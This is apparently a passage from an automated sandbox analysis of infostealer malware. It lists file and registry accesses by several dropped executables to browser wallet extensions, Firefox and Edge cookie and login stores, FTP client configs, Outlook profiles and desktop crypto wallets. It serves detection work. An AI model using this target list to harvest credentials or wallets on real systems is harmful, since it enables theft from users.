Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
